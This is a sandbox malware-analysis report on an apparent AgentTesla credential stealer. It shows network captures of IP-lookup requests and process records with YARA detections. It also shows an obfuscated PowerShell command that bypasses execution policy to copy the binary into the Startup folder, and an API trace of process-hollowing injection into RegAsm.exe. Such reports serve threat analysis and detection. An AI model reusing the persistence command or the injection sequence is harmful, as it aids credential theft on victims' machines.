Apr 19, 2024 17:14:00.312160015 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 17:14:00.462399960 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 17:14:00.462532997 CEST | 443 | 49707 | 104.26.12.205 | 192.168.2.5
Apr 19, 2024 17:14:00.462757111 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 17:14:00.469672918 CEST | 49707 | 443 | 192.168.2.5 | 104.26.12.205
Apr 19, 2024 17:14:00.587901115 CEST | 49708 | 80 | 192.168.2.5 | 208.95.112.1
Apr 19, 2024 17:14:00.704478025 CEST | 80 | 49708 | 208.95.112.1 | 192.168.2.5
Apr 19, 2024 17:14:00.704591036 CEST | 49708 | 80 | 192.168.2.5 | 208.95.112.1
Apr 19, 2024 17:14:00.704782963 CEST | 49708 | 80 | 192.168.2.5 | 208.95.112.1
Apr 19, 2024 17:14:00.831845999 CEST | 80 | 49708 | 208.95.112.1 | 192.168.2.5
Apr 19, 2024 17:14:00.876555920 CEST | 49708 | 80 | 192.168.2.5 | 208.95.112.1
Apr 19, 2024 17:15:12.861227036 CEST | 80 | 49708 | 208.95.112.1 | 192.168.2.5
Apr 19, 2024 17:15:12.861300945 CEST | 49708 | 80 | 192.168.2.5 | 208.95.112.1
Apr 19, 2024 17:15:40.472063065 CEST | 49708 | 80 | 192.168.2.5 | 208.95.112.1
Apr 19, 2024 17:15:40.588272095 CEST | 80 | 49708 | 208.95.112.1 | 192.168.2.5

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2024 17:13:59.800477028 CEST | 53977 | 53 | 192.168.2.5 | 1.1.1.1
Apr 19, 2024 17:13:59.906311989 CEST | 53 | 53977 | 1.1.1.1 | 192.168.2.5
Apr 19, 2024 17:14:00.482700109 CEST | 51034 | 53 | 192.168.2.5 | 1.1.1.1
Apr 19, 2024 17:14:00.587018967 CEST | 53 | 51034 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 19, 2024 17:13:59.800477028 CEST | 192.168.2.5 | 1.1.1.1 | 0xaf01 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Apr 19, 2024 17:14:00.482700109 CEST | 192.168.2.5 | 1.1.1.1 | 0xa8a3 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 19, 2024 17:13:59.906311989 CEST | 1.1.1.1 | 192.168.2.5 | 0xaf01 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 17:13:59.906311989 CEST | 1.1.1.1 | 192.168.2.5 | 0xaf01 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 17:13:59.906311989 CEST | 1.1.1.1 | 192.168.2.5 | 0xaf01 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Apr 19, 2024 17:14:00.587018967 CEST | 1.1.1.1 | 192.168.2.5 | 0xa8a3 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false

• api.ipify.org
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49708 | 208.95.112.1 | 80 | 1992 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 17:14:00.704782963 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Apr 19, 2024 17:14:00.831845999 CEST | 174 | IN | HTTP/1.1 200 OK
    Date: Fri, 19 Apr 2024 15:14:00 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 5
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 74 72 75 65 0a
    Data Ascii: true

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49707 | 104.26.12.205 | 443 | 1992 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 15:14:00 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-04-19 15:14:00 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Fri, 19 Apr 2024 15:14:00 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: close
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 876dd7801eae4554-ATL
2024-04-19 15:14:00 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
    Data Ascii: 81.181.57.52
                                                                      Target ID:0
                                                                      Start time:17:13:56
                                                                      Start date:19/04/2024
                                                                      Path:C:\Users\user\Desktop\PO-095325.scr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\PO-095325.scr.exe"
                                                                      Imagebase:0x4e0000
                                                                      File size:578'048 bytes
                                                                      MD5 hash:93F87D1E11C67DBC47FF98369811E826
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:17:13:57
                                                                      Start date:19/04/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe'
                                                                      Imagebase:0x10000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:17:13:57
                                                                      Start date:19/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:17:13:58
                                                                      Start date:19/04/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                      Imagebase:0xef0000
                                                                      File size:65'440 bytes
                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4466181997.0000000003314000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:5
                                                                      Start time:17:13:58
                                                                      Start date:19/04/2024
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff7e52b0000
                                                                      File size:55'320 bytes
                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                        Execution Graph

                                                                        Execution Coverage:10.9%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:128
                                                                        Total number of Limit Nodes:5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (o]q$(o]q$,aq$,aq$Haq
                                                                        • API String ID: 0-2157538030
                                                                        • Opcode ID: a366b5190b0c4abbd8745a77e198f7c552d27440cfed76290c388cfb1e106b43
                                                                        • Instruction ID: 75219180f6d3040f79e0f52cb652a204755549730620eeeb32c8c89d1a86eee6
                                                                        • Opcode Fuzzy Hash: a366b5190b0c4abbd8745a77e198f7c552d27440cfed76290c388cfb1e106b43
                                                                        • Instruction Fuzzy Hash: 43626D35A001159FDB08EF6AC884AAEB7F6FF89350F158569E8459B364DB34EC42CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (
                                                                        • API String ID: 0-3887548279
                                                                        • Opcode ID: b669cbaac20cdbf396ddc8dd2eae6b7738e2cc22cfd6261028608ff450c0d3e1
                                                                        • Instruction ID: 53187f75194f66b1a609d0bad511164524760f76f046b5c4d2fb59bab4dd84b9
                                                                        • Opcode Fuzzy Hash: b669cbaac20cdbf396ddc8dd2eae6b7738e2cc22cfd6261028608ff450c0d3e1
                                                                        • Instruction Fuzzy Hash: 7A52D174D012288FDB68DF65C894BDDBBB2BB89305F1081E9D44DAB291DB316E85CF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b78aa0876711de10a20e62f37fcb7486824789e563974ef3e14a680adfb514a8
                                                                        • Instruction ID: 0c333d7565c98884fd87e819a6847005d3d96ce40d529580da15781d13181131
                                                                        • Opcode Fuzzy Hash: b78aa0876711de10a20e62f37fcb7486824789e563974ef3e14a680adfb514a8
                                                                        • Instruction Fuzzy Hash: 1A919135E0030A8FCB00DFA1D8949DDF7B6FF8A310F148615E41AAB2A4DB70E946CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5df852e1e01ecc505bba376996e12f4e5584c80488f00801bef72d2b1fb6d798
                                                                        • Instruction ID: 7ef1580fd344eb4fea9ff45cdfca98e3af899e59bb38243a199ecf4c6d90a75e
                                                                        • Opcode Fuzzy Hash: 5df852e1e01ecc505bba376996e12f4e5584c80488f00801bef72d2b1fb6d798
                                                                        • Instruction Fuzzy Hash: 1041B679E01218CFDB18DFAAD994A9EBBF2BF89311F148129D409BB364DB705802CF11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
(graph edge data omitted) Function entry 4fbcbbc; the graph contains a CreateProcessA call in block 4fbcd57-4fbce11.
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04FBCDFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 3478a93c5352ec8cd2bc5c2922fa6a7792a6f7210233d0454c509ff4ce06f28c
                                                                        • Instruction ID: f2a946aedaf002d78a0d15969cecb8bc677fb8d441336c15b1f368d6c52be651
                                                                        • Opcode Fuzzy Hash: 3478a93c5352ec8cd2bc5c2922fa6a7792a6f7210233d0454c509ff4ce06f28c
                                                                        • Instruction Fuzzy Hash: 50918C71D00259CFEB21CF69CC417EEBBB2BF49304F14856AD858A7280DB74A986CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
(graph edge data omitted) Function entry 4fbcbc8; the graph contains a CreateProcessA call in block 4fbcd57-4fbce11.
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04FBCDFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 0c95a16220ae8084b079983f01bd249f790cb4b47dfecd76894cad256cdf2ef2
                                                                        • Instruction ID: 44c08dfc3c889cdfa66c40074a94cddde36b07dee96f1e7fc537e9cc1e360e39
                                                                        • Opcode Fuzzy Hash: 0c95a16220ae8084b079983f01bd249f790cb4b47dfecd76894cad256cdf2ef2
                                                                        • Instruction Fuzzy Hash: 35918C71D00259CFEB21CF69CC417EEBBB2BF49314F14856AD858A7280DB74A986CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
(graph edge data omitted) Function entry 4fb0f70; the graph contains a CreateWindowExW call in block 4fb0ff3-4fb1092.
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04FB1082
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: f9c91d45ae7ab5ad29b5e242b111939c0cd9039225749fff8c73f4605382428b
                                                                        • Instruction ID: 5813374be4c021ef4000805dadad35cac75a0653cd35aefec8840fc4f22f0810
                                                                        • Opcode Fuzzy Hash: f9c91d45ae7ab5ad29b5e242b111939c0cd9039225749fff8c73f4605382428b
                                                                        • Instruction Fuzzy Hash: 7B41E0B1D00359EFDB14CF9AC984ADEBBB5FF49350F24812AE818AB210D774A841CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
(graph edge data omitted) Function entry 4fb36d0; the graph contains a CallWindowProcW call in block 4fb376a-4fb37a2.
                                                                        APIs
                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 04FB3791
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: CallProcWindow
                                                                        • String ID:
                                                                        • API String ID: 2714655100-0
                                                                        • Opcode ID: 283d5f7b66e7cb566415e5d6d46a64c76dc9892ae36b93c485b64adcf8638832
                                                                        • Instruction ID: 9309b36039e208783d1d454ff981fd3210545376f4ad04e9bbd93e8fa86767bf
                                                                        • Opcode Fuzzy Hash: 283d5f7b66e7cb566415e5d6d46a64c76dc9892ae36b93c485b64adcf8638832
                                                                        • Instruction Fuzzy Hash: A1413BB9A00309CFDB14CF9AC448AAABBF5FF89314F25C459D919A7321D334A841CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
(graph edge data omitted) Function entry 4fbc938; the graph contains a WriteProcessMemory call in block 4fbc99e-4fbc9dd.
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04FBC9D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 349a3e772a133103ddb87e02b9dd0af1d2642bd1e05abedc9cb9bc296d628493
                                                                        • Instruction ID: deda30fe8ca9a531295c06e06aa9c43755515f545fab27d2a8f106b17ed6770a
                                                                        • Opcode Fuzzy Hash: 349a3e772a133103ddb87e02b9dd0af1d2642bd1e05abedc9cb9bc296d628493
                                                                        • Instruction Fuzzy Hash: F4214871D003499FDB10DFAAC881BEEBBF5FF48310F10842AE959A7240C778A955CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
(graph edge data omitted) Function entry 4fbc940; the graph contains a WriteProcessMemory call in block 4fbc99e-4fbc9dd.
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04FBC9D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 5cf5949a8111dc04c3a5c902b42401ae5fe65c0565d4cc4a142693f27afdd821
                                                                        • Instruction ID: 8dd5ecd8e1254213efe3e73479e9a1046bf23242a8c36037f365a3f30f53a01a
                                                                        • Opcode Fuzzy Hash: 5cf5949a8111dc04c3a5c902b42401ae5fe65c0565d4cc4a142693f27afdd821
                                                                        • Instruction Fuzzy Hash: AA212A71D003499FDB10DFAAC885BEEBBF5FF48310F108429E559A7240C778A955CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
(graph edge data omitted) Function entry 4fbca28; the graph contains a ReadProcessMemory call in block 4fbca28-4fbcabd.
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04FBCAB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: a14cfe962722561453111e956b2d3caccd8c79c77b935cb2faed00ea1139754d
                                                                        • Instruction ID: 1f814bf5c2d86de99859405979f2a576af382d768670b7209336f950ed88738e
                                                                        • Opcode Fuzzy Hash: a14cfe962722561453111e956b2d3caccd8c79c77b935cb2faed00ea1139754d
                                                                        • Instruction Fuzzy Hash: 982128B1C003599FDB10DFAAC881AEEFBF5FF48310F50842AE559A7250D738A541CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

Control-flow Graph
(graph edge data omitted) Function entry 28ac9fc; the graph contains a DuplicateHandle call in block 28ac9fc-28acea4.
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028ACDD6,?,?,?,?,?), ref: 028ACE97
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 6e10fad8066b168a7c016a75d333fa967dcc401a60df18173e1b0903d970ba4d
                                                                        • Instruction ID: 4b84b488904b7b672d355bf4833248bf514aa09bac9543a1809dda68d163da34
                                                                        • Opcode Fuzzy Hash: 6e10fad8066b168a7c016a75d333fa967dcc401a60df18173e1b0903d970ba4d
                                                                        • Instruction Fuzzy Hash: 6321E4B5900248AFDB10CF9AD584AEEFBF9FB48314F14845AE918A7310D378A954CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028ACDD6,?,?,?,?,?), ref: 028ACE97
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 14b9637a05c25891af2cf1677fa657c511263e514478885c8cc297d09a498e89
                                                                        • Instruction ID: cf85508c098ad6205c5871783ff83075a47f413e7826612a53b5015ff11f478e
• Opcode Fuzzy Hash: 14b9637a05c25891af2cf1677fa657c511263e514478885c8cc297d09a498e89
• Instruction Fuzzy Hash: 8421E5B59002089FDB10CF9AD584ADEBBF5EB48310F14841AE918A7210D379A955CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04FBC826
Memory Dump Source
• Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: b7a0889d5e17b2dc8c9bc02297aaeb73b3083e6723cd20f7e50f312027808c2e
• Instruction ID: 06c13e83db62a946f2012502d9af09f1dde413e369ac5bc3b63de3bc2621ef74
• Opcode Fuzzy Hash: b7a0889d5e17b2dc8c9bc02297aaeb73b3083e6723cd20f7e50f312027808c2e
• Instruction Fuzzy Hash: EE2157B1D002099FDB10DFAAC485BEEBBF4FF89314F108429D459A7240D778A945CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04FBC826
Memory Dump Source
• Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 94159f1be24d800c3f01e23782967321dff5e96b1b38c079fd3029fce30e163c
• Instruction ID: 29103c7a8ee74f37822c7fb3095cd4a52bcf86eadbd3b0695d51616f4ba2576e
• Opcode Fuzzy Hash: 94159f1be24d800c3f01e23782967321dff5e96b1b38c079fd3029fce30e163c
• Instruction Fuzzy Hash: 3A2134B1D002098FDB10DFAAC4857EEBBF4EF89314F14842AD459A7240CB78A945CBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04FBCAB0
Memory Dump Source
• Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 43760d2228d3cff6d3cc5c22398acd8d6cea5a8166f04e2593666db2d23da902
• Instruction ID: 79a00a9af1c7f1ed198d7a52395fcce4fbf7aeec73a1d5bc03cf36430f5766d8
• Opcode Fuzzy Hash: 43760d2228d3cff6d3cc5c22398acd8d6cea5a8166f04e2593666db2d23da902
• Instruction Fuzzy Hash: AF2137B1C003499FCB10DFAAC881AEEFBF5FF48310F10842AE559A7250D738A941CBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04FBC8EE
Memory Dump Source
• Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 3b46472a93ad51d667c491695115001297137100e9e7c7fdf89d18309b501d60
• Instruction ID: fa2d092e00e85daf79954c9ab81cc0c5cfe9c6beb27639fed7dacd1155518209
• Opcode Fuzzy Hash: 3b46472a93ad51d667c491695115001297137100e9e7c7fdf89d18309b501d60
• Instruction Fuzzy Hash: 51115671C002499FDB20DFAAC845AEFBFF5EF88324F108819E519A7250C739A551CFA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028AA7F9,00000800,00000000,00000000), ref: 028AAA0A
Memory Dump Source
• Source File: 00000000.00000002.2029188556.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_PO-095325.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: c1a02357da8eddbe462d4576cfa4ba056a9b4f834bc915dbd58c284e61eb5c67
• Instruction ID: 9efacf207365af73b21491f11839e940afd226a9b1278a8570fe76627245761e
• Opcode Fuzzy Hash: c1a02357da8eddbe462d4576cfa4ba056a9b4f834bc915dbd58c284e61eb5c67
• Instruction Fuzzy Hash: ED1144BA9003089FDB24CF9AC444AEEFBF4EB88314F14802AD519A7600C778A544CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04FBC8EE
Memory Dump Source
• Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 63d5725c2bf75ea8e6045a0eb1499a5c9681ecac509189307780cedaeab66192
• Instruction ID: 129fd4f44ba640504efe585b0b0b0b3acccde8f7cf42fbee53c5b53b0622a559
• Opcode Fuzzy Hash: 63d5725c2bf75ea8e6045a0eb1499a5c9681ecac509189307780cedaeab66192
• Instruction Fuzzy Hash: 0C1137719002499FDB10DFAAC845AEFBFF5EF88324F108419E559A7250C779A550CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2032232555.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4fb0000_PO-095325.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
